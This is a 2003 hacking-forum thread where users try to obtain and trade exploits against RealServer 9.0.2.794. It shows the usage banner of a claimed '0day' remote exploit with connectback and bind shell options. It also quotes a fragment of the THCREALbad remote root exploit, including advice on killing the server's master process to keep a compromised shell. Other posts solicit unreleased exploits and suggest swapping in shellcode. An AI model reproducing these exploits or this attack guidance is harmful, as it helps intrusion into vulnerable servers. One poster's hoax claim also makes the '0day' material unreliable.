Has anyone been able to successfully exploit this version of realserver: RealServer Version 9.0.2.794 (win32). It seems like this particular version of 9.x is patched? Any comments...
Ripper
Sep 5 2003, 10:24 PM
yes i guess it is... i know that's TOO bad cause most of the win32 are up to date
bratt
Sep 5 2003, 10:26 PM
You want this exploit ? ........is a 0day
-f use findsck shellcode - [Linux Arch]
-c [ip] connectback ip - cb port must be 10293 [Linux-FreeBSD Archs]
-b bind port [Win32,Linux,FreeBSD Archs]
-t [look down]
I also want it if u have it...but have u gotten that exploit to work on this particular version of realserver 9.
Ripper
Sep 6 2003, 09:44 AM
yes bratt, that exploit would be nice
woutiir
Sep 6 2003, 10:32 AM
Yeah, post it here or in a new topic. Would be great..
Greetings, woutiir
Icarus
Sep 6 2003, 01:35 PM
Great yes bratt i want this exploit
bratt
Sep 6 2003, 03:01 PM
A member of our crew has it ...he found it on a stro yesterday
We want to exchange with other unreleased exploit ...if u have it contact
tnkcrew@email.it
Daume
Sep 6 2003, 03:07 PM
[xt33nx@cha0tix .0rp89]$./rp89
-----------------------------------------------------
Real Server 8.0.2.471 - 9.0.2.794,Helix Universal Server Exploit - priv-ed
By xt33nx - cha0tix crew
Usage: ./rp89 [-fcbt] [host] [port]
-f use findsck shellcode - [Linux Arch]
-c [ip] connectback ip - cb port must be 10293 [Linux-FreeBSD Archs]
-b bind port [Win32,Linux,FreeBSD Archs]
-t [look down]
Targets:
0 - 8.0.2.471 - 9.0.2.794 [Linux Arch]
1 - Helix Universal 9.0.2 - soon! lol [Linux Arch]
2 - 8.0.2.471 - 9.0.2.794 [Win32 Arch] [WinXP/Win2000]
3 - 8.0.2.471 - 9.0.2.794 [Win32 Arch] [NT4]
4 - 8.0.2.471 - 9.0.2.794 [FreeBSD Arch]
-- ok, decided to give this baby out, since it has been exploited alot from the release of THCREALbad 0.4
-- ideas,codez from canvas and THCREALbad
-- mail ur 0day,unreleased exploits to xt33nx@linuxmail.org or xt33nx@hotmail.com
Ripper
Sep 6 2003, 09:42 PM
already got that Foxweb proof of concept exploit?? i think you do... else you won't have the Realserv one
arhamz
Sep 7 2003, 02:20 AM
i found the following code for Real Server 9, 8, 7 Remote Root Exploit (Windows & Linux)
QUOTE
/***************************************************************
/* THCREALbad 0.4 - Wind0wZ & Linux remote root exploit
/* Exploit by: Johnny Cyberpunk thehackerschoice
/* THC PUBLIC SOURCE MATERIALS
/*
/* http://www.service.real.com/help/faq/secur...loit082203.html
/*
/* After successful exploitation of a Linux box just type in the following
/* ps -ef | grep -i rmserver
/* and then search for the first appearing master pid of rmserver and type
/* kill -9 <master pid of rmserver>
/* Otherwise the master process detects that the compromised thread isn't
/* running in a stable state any longer and kicks u of the box.
/* On Windows Realservers it doesn't matter, the connection keeps up.
/*
/* Also try the testing mode before exploitation of this bug, what OS is
/* running on the remote site, to know what type of shellcode to use.
/*
/* Greetings go to Dave Aitel of Immunitysec who found that bug.
/*
/* compile with MS Visual C++ : cl THCREALbad.c
/***************************************************************

strcpy(finalbuffer,attackbuffer1);
os = (unsigned short)atoi(argv[2]);
switch(os)
{
  case WINDOWS:
    decoder[11]=0x90;
    break;
  case LINUX:
    decoder[11]=0x05;
    break;
  case OSTESTMODE:
    break;
  default:
    printf("\nillegal OS value!\n");
    exit(-1);
}

void usage()
{
  unsigned int a;
  printf("\nUsage: <Host> <OS>\n");
  printf("0 = Wind0wZ\n");
  printf("1 = Linux\n");
  printf("2 = OS Test Mode\n");
  exit(0);
}
i dont know if its the same one as we use .... but here it is ..... anyone here can compile it ?.... hopefully its not the same one .... i dont know ... just check it out ... thanx...
arhamz
Sep 7 2003, 02:22 AM
k.. after i figured out that this is the same one. ... so sorry guyz .... i feel very stupid now ...
bratt
Sep 7 2003, 09:04 AM
QUOTE (arhamz @ Sep 7 2003, 02:22 AM)
k.. after i figured out that this is the same one. ... so sorry guyz .... i feel very stupid now ...
lol
Ripper
Sep 7 2003, 11:51 AM
hmm...
arhamz
Sep 7 2003, 04:57 PM
i dun really got a zero day exploit ... so ill just wait it to be local i guess .... since ppl are actin up cuz they got a 0day exploit ...
Ripper
Sep 7 2003, 07:53 PM
please just post it, it's not 0day anymore but maybe you want anything else in return? not another "0day" exploit, but something else?
arhamz
Sep 8 2003, 04:39 AM
ya man i dont get those ppl ... ... really dont .... should help others....
dissolutions
Sep 8 2003, 06:00 AM
FIRST OFF: This is a help forum... if you want to speak you can speak on here or don't use this medium as the first spot for communication!! if you have a 0 day exploit then so be it... If you're going to give it out, give it out, if you're not then keep your mouth shut about it!
SECONDLY: Guys I hate to break their bubble but until I see it from a reliable source (which these 2 guys aren't reliable at all) considering in their "Examples"
QUOTE
[xt33nx@cha0tix .0rp89]$./rp89
-----------------------------------------------------
Real Server 8.0.2.471 - 9.0.2.794,Helix Universal Server Exploit - priv-ed
By xt33nx - cha0tix crew
Usage: ./rp89 [-fcbt] [host] [port]
It's RealServer, no space. And there's no other documented version other than a hoax thread on zone-h.org which for some reason has exactly the same output as Daume.
Guys i'd say this is mostly just a social engineer.
bratt
Sep 8 2003, 12:27 PM
QUOTE (dissolutions @ Sep 8 2003, 06:00 AM)
FIRST OFF: This is a help forum... if you want to speak you can speak on here or don't use this medium as the first spot for communication!! if you have a 0 day exploit then so be it... If you're going to give it out, give it out, if you're not then keep your mouth shut about it!
SECONDLY: Guys I hate to break their bubble but until I see it from a reliable source (which these 2 guys aren't reliable at all) considering in their "Examples"
QUOTE
[xt33nx@cha0tix .0rp89]$./rp89
-----------------------------------------------------
Real Server 8.0.2.471 - 9.0.2.794,Helix Universal Server Exploit - priv-ed
By xt33nx - cha0tix crew
Usage: ./rp89 [-fcbt] [host] [port]
It's RealServer, no space. And there's no other documented version other than a hoax thread on zone-h.org which for some reason has exactly the same output as Daume.
Guys i'd say this is mostly just a social engineer.
no comment
-= mAc =-
Sep 8 2003, 12:53 PM
@bratt: could you post this prog?
eXtErNaL
Sep 8 2003, 01:40 PM
what a non-sharing MF
Ripper
Sep 8 2003, 02:34 PM
nice pic bratty... i still miss the file in File Downloads section
(for CHR*ST's sake it's not 0day anymore!!!)
raptor
Oct 26 2003, 09:30 PM
if you google for any exploit even 0day you'll find it... but i don't think this board is for lamers... i think that anyone that wants to be respected in this forum shouldn't ask for existing and easy to find sploits.... this is no 0day any more... so stop with this... find it in google and use it... lets write a new sploit for something not found yet... there are lot of unexploited vulns found this week... don't chew the same gum again and again...
T3cHn0b0y
Oct 26 2003, 08:47 PM
Maybe someone can switch the realserver shellcode in the thcrealbad source code with the IIS Media Services exploit shellcode and recompile it? Just an idea
N8Falke
Oct 24 2003, 02:12 PM
i still search this tool too.....
can someone help ????
please .... can someone share it ???
greets